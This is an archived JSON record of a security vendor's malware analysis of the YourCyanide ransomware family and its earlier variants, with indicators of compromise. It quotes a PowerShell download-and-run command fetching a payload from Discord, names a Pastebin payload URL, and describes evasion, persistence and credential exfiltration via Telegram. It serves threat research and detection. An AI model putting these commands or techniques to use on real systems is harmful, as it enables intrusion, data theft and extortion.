{
	"id": "3ca1718d-7e34-4ca4-9a5a-18756a82c734",
	"created_at": "2026-04-06T00:11:22.804378Z",
	"updated_at": "2026-04-10T13:11:40.642076Z",
	"deleted_at": null,
	"sha1_hash": "ea311d125c64911ae97dcc23b41183ec58919349",
	"title": "YourCyanide: A CMD-Based Ransomware With Multiple Layers of Obfuscation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 86089,
	"plain_text": "YourCyanide: A CMD-Based Ransomware With Multiple Layers of\r\nObfuscation\r\nPublished: 2022-06-02 · Archived: 2026-04-05 19:24:54 UTC\r\nThe earliest sample of this ransomware, known as GonnaCope, was found by Twitter user Petrovic in April 2022. This\r\nvariant possessed the ability to overwrite its victim's files — however, this was limited to the current directory in which the\r\nransomware was being executed.\r\nUpon checking the latest variant of this malware, we observed that the malware author was sending messages to all users in\r\nthe compromised network notifying them of the infiltration. Along with this, another message was sent stating that\r\n\"Kekware and Kekpop were just the begining\" — indicating that the author was preparing a more sophisticated variant of\r\nthe original ransomware.\r\nTable 1 shows when the additional variants of the original CMD/BAT-based ransomware were uploaded to VirusTotal.\r\nDate earliest sample was uploaded to VirusTotal Ransomware sample\r\n07 Apr 2022  GonnaCope\r\n07 May 2022 Kekpop\r\n11 May 2022  Kekware \r\n13 May 2022  YourCyanide\r\nTable 1. CMD-based ransomware samples and their date of upload to VirusTotal\r\nYourCyanide technical analysis\r\nIt initially arrives as an LNK file that contains the following PowerShell script for downloading the \"YourCyanide.exe\" 64-\r\nbit executable from Discord and executing it:\r\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Command \"(New-Object\r\nNet.WebClient).DownloadFile('hxxps://cdn.discordapp.com/attachments/974799607894769704/975527548983341056/YourCyanide.exe',\r\n'YourCyanide.exe')\"; start YourCyanide.exe\"\r\nThis 64-bit executable file creates and executes a CMD file with the filename YourCyanide.cmd.\r\nThe dropped YourCyanide.cmd file contains a script downloaded from Pastebin that is saved using the same filename\r\n(YourCyanide.cmd).\r\nThe ransomware will create a registry key in HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce for cleanup\r\npurposes. It then runs advpack.dll to delete the folder containing the malicious CMD file to remove traces of the downloader\r\nfrom the machine.\r\nThe downloaded script file contains 10 layers of obfuscated code, with each layer being needed to deobfuscate the\r\nsucceeding layer. It takes advantage of the Enable Extensions and Enable Delayed Extensions commands, causing variables\r\nwithin a batch file to be expanded at execution time rather than at parse time.\r\nThe malware uses following format for its obfuscation technique:\r\n%parameter:~index of character, number of characters to take%\r\n%Kesik:~19,1%, will return 1 character from the index value 19 of parameter Kesik\r\nUpon execution, YourCyanide sets its file attributes as hidden and as a system file, then launches five maximized Command\r\nPrompt windows.\r\nIt will then try to add a user \"session\" to the Administrators group using the net localgroup command.\r\nhttps://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html\r\nPage 1 of 9\n\nIt also creates an autostart mechanism for persistence by creating a registry key in\r\nHKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run and then copying itself to the Startup directory. It also disables\r\nTask Manager by modifying its registry entry.\r\nIt then checks if %SystemDrive%\\AutoExec.bat exists, and if so, it deletes the original and then copies itself and sets the file\r\nto read only, hidden, and as a system file. \r\nIt also avoids machines with the following usernames, some of which, according to our research, are usernames used by\r\nmalware researchers and sandbox systems — implying that the malware author is noting which machines should be evaded:\r\na.monaldo \r\nGeorge\r\ngeorge\r\nhelp\r\nkarolisliucveikis \r\nSoumy\r\nguent\r\nAfter checking the username of the infected machine, it drops and executes a batch file in UserProfile\\Documents\\black.bat.\r\nThis batch file is responsible for continuously opening the Blank Screen Saver file, which renders the machine inaccessible\r\nwhile the malware is running.\r\nYourCyanide also terminates several services and security applications by concatenating variables to form the strings \"net\r\nstop,\" \"norton,\" \"symantec,\" and \"McAfee.\"\r\nIt then swaps the mouse button using the SwapMouseButton Export function of the user32.dll file.\r\nAfter terminating applications, it renames files from the following directories to \u003crandom number\u003e*\u003crandom\r\nnumber\u003e.cyn and overwrites its contents to a random number using a built-in variable in CMD shell called %random%.\r\n%MyDesktop%\r\n%MyDocuments%\r\n%MyMusic%\r\n%MyPictures%\r\n%MyVideos%\r\n%Downloads%\r\n \r\nAlthough no actual encryption is being performed, users will still be heavily inconvenienced due to their files being renamed\r\n— especially for those with large amounts of files in these particular folders. Furthermore, since the malware is still\r\ncurrently under development, it’s likely that the malware authors are still finalizing the encryption portion of the routine.\r\nIt then creates the following ransom notes and drops them into %MyDesktop%:\r\nYcynNote.txt\r\nother.txt\r\nIt features two instances in which it copies itself to batch files and then appends the malicious code (shown in Figure 16) to\r\nwin.ini and system.ini.\r\nAfter performing its routine, it deletes the black.bat file in the %MyDocuments% directory, which is responsible for\r\nrendering the machine inaccessible. Deleting the file will stop the blank screen saver file from continuously opening.\r\nYourCyanide is also capable of spreading via email and to different drives. It creates two VBScript\r\nfiles, mail.vbs and loveletter.vbs, that send an email using the following subjects (with itself as an attachment):\r\nI Have a crush on you\r\nCheck This Out\r\nIt then copies itself to the following drives or directories:\r\nD:\r\nE:\r\nF:\r\nG:\r\nH:\r\n%UserProfile%\r\nYourCyanide enables Remote Desktop Connection (RDP) by using the netsh commands shown in Figure 18.\r\nhttps://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html\r\nPage 2 of 9\n\nThe ransomware opens multiple local ports by adding firewall rules for Transmission Control Protocol (TCP) and User\r\nDatagram Protocol (UDP) connections via the netsh advfirewall function.\r\nIt then downloads and executes another CMD file (ycynlog.cmd) from hxxps://pastebin[.]com/raw/2K5m42Xp.\r\nThe ycynlog.cmd file is responsible for the collection and exfiltration of stolen information from the compromised machine.\r\nLike the main file, it also features multiple layers of obfuscation. Upon execution, the file hides itself and creates its\r\nautostart mechanism by producing a registry key in HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, and by\r\ncopying itself to the Startup directory.\r\nThe malware uses the Telegram chatbot API to exfiltrate the stolen information and sets it to variable \"Webhook\"\r\nIt downloads another executable from Discord (GetToken.exe). Running this executable creates the file MyTokens.txt,\r\nwhich contains stolen access token data from different applications such as Chrome, Discord, and Microsoft Edge.\r\nIt also collects the following machine information and stores it in userdata.txt:\r\nIP addresses\r\nMAC addresses\r\nCPU Information\r\nMemory Size\r\nPartition information\r\nSystem specifications\r\nOS product key\r\nCurrently running processes\r\nBoth Tokens.txt and userdata.txt will then be sent via Telegram chatbot API using the curl command.\r\nWe also discovered that YourCyanide exfiltrates Minecraft-related credentials.\r\nFinally, it downloads another executable from Google Docs and executes it using the parameter \"/stext ForME.txt\".\r\nForMe.txt will then be sent to the Telegram chatbot. While the Google Docs link is currently inaccessible, and therefore a\r\nsample can't be sourced, we noticed that it is run using the same parameter as the sample \"passwords.exe,\" which is also\r\nused by the earlier Kekpop variant. The parameter \"/stext\" is employed when executing the file, which is similar to the\r\nWebBrowserPassView application used to retrieve credentials stored by various web browsers such as Internet Explorer\r\n(Version 4.0 - 10.0), Mozilla Firefox (all versions), Google Chrome, Safari, and Opera.\r\nThe file created from executing passwords.exe contains saved passwords that are stored in Google Chrome.\r\nAvoiding usernames\r\nOf the usernames this malware avoids, three in particular stand out. Namely: a.monaldo, karolisliucveikis, and soumy. Upon\r\nfurther research, we discovered that these are usernames   from sandbox environments.\r\nThe username of the sandbox machine used by Hunter Yomi\r\nVariant Comparison\r\nThe team analyzed these CMD-based ransomwares and came up with the following table that compares each variant and\r\ntheir differences. One notable difference is that GonnaCope, the earliest variant, does not collect user credentials from web\r\nbrowsers and list of applications, and does not enable RDP connections. Furthermore, it does not execute black.bat, the file\r\nthat temporarily causes the machine to become inaccessible while the malware executes its payload. We also observed that\r\nthe BTC address used by GonnaCope is different from the BTC address of the succeeding variants and it contains a different\r\nransom note format. The variants also differ in their delivery —  shifting between arriving as an archive, executable files, or\r\nLNK files that drop the CMD-based ransomware. The payloads are also located in different parts of the chain, with some\r\nbeing found in the main CMD file, while others are found in files that are downloaded from Pastebin and Discord.\r\nBehavior GonnaCope Kekware Kekpop\r\nCreates auto-start\r\nmechanism\r\nYes Yes Yes\r\nDisables task\r\nmanager\r\nYes Yes Yes\r\nhttps://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html\r\nPage 3 of 9\n\nChecks the username\r\nof the machine\r\nNo Yes Yes\r\nCreates and\r\nexecutes black.bat to\r\ncontinuously turn on\r\nBlank Screen Saver\r\nNo Yes Yes\r\nStops services Yes Yes Yes\r\nTerminates\r\napplications\r\nYes Yes Yes\r\nSwaps mouse buttons Yes Yes Yes\r\nRenames files\r\nGonnaCope.cope\r\nrandom.cope\r\n\u003cRandom\u003e.\u003cfile extension\u003e.\u003cRandom\u003e.cyn\r\n\u003cRandom\u003e.\u003cfile exte\r\n\u003cRandom\u003e.kekpop\r\nGathers a list of\r\ninstalled applications\r\nNo Yes Yes\r\nCollects machine\r\ninformation\r\nYes Yes Yes\r\nCollects token access\r\ndata\r\nYes Yes Yes\r\nCollects passwords\r\nsaved in web\r\nbrowsers\r\nNo Yes Yes\r\nSends an email with\r\na copy of itself as an\r\nattachment\r\nYes Yes Yes\r\nSubject of sent email\r\nIs this you?\r\nHere is that document you needed\r\nI Have a crush on you\r\nCheck This Out\r\nI Have a crush on you\r\nCopies itself in\r\ndrives\r\nYes Yes Yes\r\nEnables RDP\r\nconnection\r\nNo Yes Yes\r\nRansom note\r\nmessage\r\nYour files are unusable pay $100 in bitcoin to\r\nbc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll\r\nto get your files back or allow it into outlook for\r\na decryption key\r\nQ: What happened to my files\r\nA: They got encrypted by kekware.\r\nQ: how can i get them back\r\nA: You can get them back by paying $500 in\r\nbitcoin to this btc wallet\r\nbc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf.\r\nQ: What happened to\r\nA: They got encrypted\r\nQ: how can i get them\r\nA: You can get them b\r\nbitcoin to this btc wal\r\nbc1qrl532s9r2qge8d8\r\nhttps://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html\r\nPage 4 of 9\n\nQ: What happens if i dont pay\r\nA: You will never get your files back.\r\nQ: What happens if i\r\nA: You will never get\r\nQ: Is this related to kp\r\nA: No fuck kpop\r\nOther messages     kekpop is on your net\r\nBTC wallet used bc1qlly4puaz7pz3zmph8n2d620jc2j60qf4ve5qll bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf bc1qrl532s9r2qge8d8\r\nConclusion\r\nThe continued use of heavily obfuscated script results in very low detections for these CMD-based ransomware, making it\r\neasier to compromise their victims’ machines. Even if the technique is not new, the use of multilayer custom environment\r\nvariables for obfuscation is highly effective in avoiding detection. These ransomware variants are also capable of\r\ndownloading multiple payloads, performing lateral movement via emails, and using Discord, Pastebin and even Microsoft\r\ndocument links.\r\nFrom our analysis, we are able to infer that the malware author is actively monitoring the reports created by malware\r\nresearchers by taking note of the usernames found in their sandbox logs and reports, and including them in the evasion list of\r\nusernames and machines that is part of the initialization process of the malware being used. \r\nRansomware variants that possess multiple capabilities — such as the one analyzed in this blog entry — are gaining\r\npopularity. While YourCyanide and its other variants are currently not as impactful as other familiesnews article, it\r\nrepresents an interesting update to ransomware kits by bundling a worm, a ransomware, and an information stealer into a\r\nsingle mid-tier ransomware framework.\r\nIt is also likely that these ransomware variants are in their development stages, making it a priority to detect and block them\r\nbefore they can evolve further and do even more damage.\r\nTrend Micro solutions\r\nA multilayered approach can help organizations defend against ransomware attacks using security technologies that can\r\ndetect malicious components and suspicious behavior.\r\nTrend Micro Vision One™products provides multilayered protection and behavior detection, which helps block\r\nsuspicious behavior and tools before the ransomware can do any damage.\r\nTrend Micro Cloud One™ Workload Securityproducts protects systems against both known and unknown threats that\r\nexploit vulnerabilities through virtual patching and machine learning.\r\nTrend Micro™ Deep Discovery™ Email Inspectorproducts employs custom sandboxing and advanced analysis\r\ntechniques to effectively block malicious emails that can serve as entry points for ransomware.\r\nTrend Micro Apex One™products offers automated threat detection and response against advanced concerns such as\r\nfileless threats and ransomware, ensuring endpoint protection.\r\nIndicators of Compromise\r\nGONNACOPE    \r\nFile SHA256 Detection\r\nGonnaCope.Bat ab71472e5a66740369c70715245a948d452a59ea7281233d6ad4c53dfa36b968 Trojan.BAT.GONNACOPE.A\r\nGonnaCope.Bat 0dff760288b3dfebc812761a2596563e5f0aea8ffc9ca4a4c26fa46e74311122 Trojan.BAT.GONNACOPE.THEOEBB\r\nGonnaCopeDL f9fdfb0d4e2d2ea06ce9222280cd03d25c9768dfa502b871846153be30816fd3 Trojan.MSIL.GONNACOPE.A\r\nhttps://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html\r\nPage 5 of 9\n\nGonnaCopeCryptor 2987b5cacc9de6c3a477bd1fc21b960db3ea8742e3b46906d134aa8b73f17280 Ransom.MSIL.GONNACOPE.YXCEE\r\nGonnaCope 7388722c3a19854c1ccf19a92798a7cef0efae538e8e8ecf5e79620e6a49cea7 TrojanSpy.MSIL.GONNACOPE.A\r\nGonnaCopeRansNote 7edb2d152d8744343222b1b93ff846616fc3ca702e96c7e7a3663d2d938d8374 Ransom.MSIL.GONNACOPE.A.note\r\nmail.vbs 26bde18048c32f6612d8d76b8696b2ce59db227913dccd51f696b51640ee11e9 Worm.VBS.GONNACOPE.A\r\nmsg.vbs ca84abd94b65d69ee8d26ffc3cc63a5a0886136e63d405ac293fefecc1d2ff3a PUA.VBS.GonnaLoop.A\r\nmsgbox.vbs d12e08e5dd94021dfa59d36d3adfe7f47df180023a04be781fa7695adc5ccc54 PUA.VBS.GonnaLoop.A\r\nnokeyboard.reg a029ae77eced03e515a2acb0ee8ebecf3aebea402e441beef1615e3488234f8e PUA.Win32.Disabler.A\r\nReadme.txt 9c39b7535b527df3b70800562bad98dc2e046de321fe3914dab896eda753cf38 Ransom.Win32.GONNACOPE.YXCEW.no\r\ndownloader.vbs 45189864b6ff6d844d27b59123d2cd461f539d42b362e60e49da50119f0b7083 Trojan.VBS.GONNACOPE.A\r\n     \r\nKEKPOP    \r\nFile SHA256 Detection\r\nArrival\r\nc8d6298f5ef09a324bb6afc7bb4550857fbd0fcbaea2b315b4f00d78bcc6a262\r\n Trojan.BAT.KEKPOP.THEACBB\r\n296ba1469d072c37c6361fe80ba396a92f6461b9562103a3b5a20841d0757722\r\nMain File \r\nbfd9336deeb399f412c51f8f6797e6b5dc81afa1f1638ab937a28df733a78c0f\r\nRansom.BAT.KEKPOP.THEAABB\r\nf8a0d9ea41c2b9082f9aebbc7e337b22d1092dd307ccd34d71fdbd56fd94a41d\r\n1e791e8511ac29bf4fd2a289ed35bb24151a7b0bfa3ab9854b2a586ede050a54\r\nd2d25dee61b17133415b4856412f20134823177effccd53a1f14677d372a4b56\r\nDropped BAT File 1 Trojan.BAT.KEKPOP.THEACBB\r\nDropped BAT File 2 9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75 TrojanSpy.BAT.KEKPOP.THEACBB\r\nDropped BAT File 3 7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b Trojan.BAT.KEKPOP.THEACBB\r\nDropped Text File Ransom.BAT.KEKPOP.THEACBB.note\r\nDropped HTML File Ransom.HTML.KEKPOP.THEACBB.note\r\nhttps://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html\r\nPage 6 of 9\n\nPasswords.exe 53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56 HackTool.Win32.NirsoftPT.SM\r\nGetToken.exe 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 Trojan.MSIL.TOKENSTEALER.YXCES\r\nkekpopdicord.exe e5f589027e859e8bedb2d5fbecff37dcf7bcf7e4af6671c1c0c9aac9b6712913 Trojan.Win64.KEKPOP.YXCET\r\nTrojan.BAT.KEKPOP.YXCEZ\r\n     \r\nKEKWARE    \r\nFile SHA256 Detection\r\nArrival\r\n3262ece43e7135c9ed6788588bae269ed75db800964d48cfb762542e0d003259 Trojan.PS1.KEKPOP.YXCEST\r\n23269070507a70c34a4e219f9be19943211ed38eec4a9ce2b3a49bf76676a5e3 Trojan.PS1.KEKPOP.YXCEST\r\nMain File  e0946a55e9cbdb3485f154f72994bad765b74ba280a2149485af113503b7dc78 Trojan.BAT.KEKPOP.YXCEST\r\nYcynNote.txt 602533e3c67a248e4dc152fa266a372dd2b2d82ff68fdc17c1591ecc429147bc Ransom.BAT.KEKPOP.YXCEST.note\r\nrAndom.cmd 7fed00a9456b6945813f46294d2f587e7486b38917a8818a77774a2a8e2cfe9b Trojan.BAT.KEKPOP.THEACBB\r\ncynlog.cmd 9b087a352fcb0a61545dbd68f7dfa32e0e15f98ca1547207d9ff918881ff5c75 TrojanSpy.BAT.KEKPOP.THEACBB\r\nPasswords.exe 53043bd27f47dbbe3e5ac691d8a586ab56a33f734356be9b8e49c7e975241a56 HackTool.Win32.NirsoftPT.SM\r\nGetToken.exe 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 Trojan.MSIL.TOKENSTEALER.YXCES\r\nblack.bat 07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85 Trojan.BAT.KEKPOP.YXCEST\r\nloveletter.vbs f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416 Worm.VBS.MASSMAIL.YXCEST\r\nmail.vbs 080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868 Worm.VBS.MASSMAIL.YXCEST\r\nfasdgfsdga.cmd 56622656231060b6401dcea515953d517fd9212b8de66c33c4847840aa958c83 Trojan.BAT.POWLOAD.TIAOELC\r\n     \r\nYOURCYANIDE    \r\nFile SHA256 Detection\r\nLNK 31655244d3b77ae661f10199cd823f54c473d92a88ae892ee1b75bc5794482ad Trojan.LNK.KEKPOP.YXCEST\r\nhttps://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html\r\nPage 7 of 9\n\n9e973f75c22c718c7438bc1d4614be11ae18e2d5140ecc44c166b5f5102d5fbe Trojan.LNK.KEKPOP.YXCERT\r\nc5d842735709618ee4f2521c95bf029a0690c3cbe5f7a06a916f633ebe09dd50 Trojan.LNK.KEKPOP.YXCERT\r\nf9a2c524c270d581b83c010136402c00623bb36b2dd7758ea5e59c9369fa7649 Trojan.LNK.KEKPOP.YXCERT\r\nWin64 EXE Dropper\r\n8249d6e886a97aec60d35d360773e76c6630d822817dabe1c7674a0b51965669 Trojan.Win64.KEKPOP.YXCEST\r\nd51538d8da12af8ae36f95b645e76218e4fd61ab433504a3900c14942160446c Trojan.Win64.KEKPOP.YXCERT\r\n6a645f72acf1d6c906e8c844e4e8b3fc92c411bf69937cfe7069df2cc51b8a4e Trojan.Win64.KEKPOP.YXCERT\r\n2f2fac2c91268a9b31401633b63a374242e46919dc21106466c6c05bab3ce3f8 Trojan.Win64.KEKPOP.YXCERT\r\na180c31666788fb6a7da421a743bb1c487099297ec06f2bdd841f342021f3763 Trojan.Win64.KEKPOP.YXCERT\r\nDownloader of the\r\npayload\r\nb43d1af1abeef8b552f0b362b2162c3a940a843f5474518c665e145b3aa01ace Trojan.PS1.KEKPOP.YXCEST\r\n6e33a2c56b7b32be8e99a15920cf179b4e7aa62eaef8496ace67261543569c25 Trojan.LNK.KEKPOP.YXCERT\r\nMain File\r\n(YourCyanide.cmd)\r\n6ab0e2e13c32b18b06b9b93b1fe607a7e04a5c0ba09816c36fba1573a47ded91 Trojan.BAT.KEKPOP.AB\r\nf8860ce270a2dec3ae1c51ff2c9aea5efe0015d519ebac4ca4c1ac0d97e73323 Ransom.BAT.KEKPOP.YXCERT\r\n8f0dbf9a6841ced62d7f5c130f420bd5a2b39141097fefba9727034d1bf3b402 Ransom.BAT.KEKPOP.YXCERT\r\n67a1e573955304887d30ff924eb01ba8a60a188835d7275265ecc716360fb0cf Ransom.BAT.KEKPOP.YXCERT\r\na3523e2ba2c221593a0c16640bfeef8cd146f747fa62620cc2834e417578c34c Ransom.BAT.KEKPOP.YXCERT\r\n0ed64dd6e08e5b9c9282966f439ab8881b4611052838db1ef79fabc38b8a61d2 Ransom.BAT.KEKPOP.YXCERT\r\nblack.bat 07fab8134ff635078cab876dba1e35c536936d193a3667637e0561c6efbb0a85 Trojan.BAT.KEKPOP.YXCEST\r\nycynlog.cmd 298c325bbc80af8b3ac77365dd7cc3f97000a8377f36937d8563ab743a92b21c TrojanSpy.BAT.KEKPOP.YXCEST\r\nYcynNote.txt 4e455d4b353c7cce0155ce1050afc30d064fd93c57bc6428eb3cd988ecd855f0 Ransom.BAT.KEKPOP.YXCERT.note\r\nother.txt a4c3412ac96061561c6cf05a259dd14e5151fe66eee115ff154d6a0366ba1a12 N/A - non-malicious component\r\nloveletter.vbs f0afc40bec9453d38f2cd7d70e25bc76797839c2d28180904295639080013416 Worm.VBS.MASSMAIL.YXCEST\r\nmail.vbs 080c4f412087aa3b652e8777ea00c801424ad6c4326bf020b9c264440e37c868 Worm.VBS.MASSMAIL.YXCEST\r\nhttps://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html\r\nPage 8 of 9\n\nGetToken.exe 6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983 Trojan.MSIL.TOKENSTEALER.YXCES\r\nForMe.exe N/A\r\n316403043e4135474637c0e3f958e72015a08242dc2712f7635012e253cb81b2 Trojan.LNK.KEKPOP.YXCEST\r\n6a95f52d228316f9b48618a1c728e1c47ec71843e5b4cfb76ab3ef86dcd8cf8c Trojan.LNK.KEKPOP.YXCEST\r\nRead_Me.txt.cmd 77fd8fba88236d5f55bbb12dbaaa69ee7673397d8606c0c67b22ce523af818cd Trojan.BAT.POWLOAD.TIAOELB\r\nMain File\r\n(WinBugsFix.cmd)\r\n40b923db9c5da6b3bfe345139c42a71e2fd124de6a2808f8cec2a979a044f191 Ransom.BAT.KEKPOP.YXCEST\r\nb0f7c2021c00a1d495f408295d161befa3faceab02d9c4047cee4904db6c1272 Ransom.BAT.KEKPOP.YXCEST\r\nSource: https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html\r\nhttps://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html"
	],
	"report_names": [
		"yourcyanide-a-cmd-based-ransomware.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434282,
	"ts_updated_at": 1775826700,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ea311d125c64911ae97dcc23b41183ec58919349.pdf",
		"text": "https://archive.orkl.eu/ea311d125c64911ae97dcc23b41183ec58919349.txt",
		"img": "https://archive.orkl.eu/ea311d125c64911ae97dcc23b41183ec58919349.jpg"
	}
}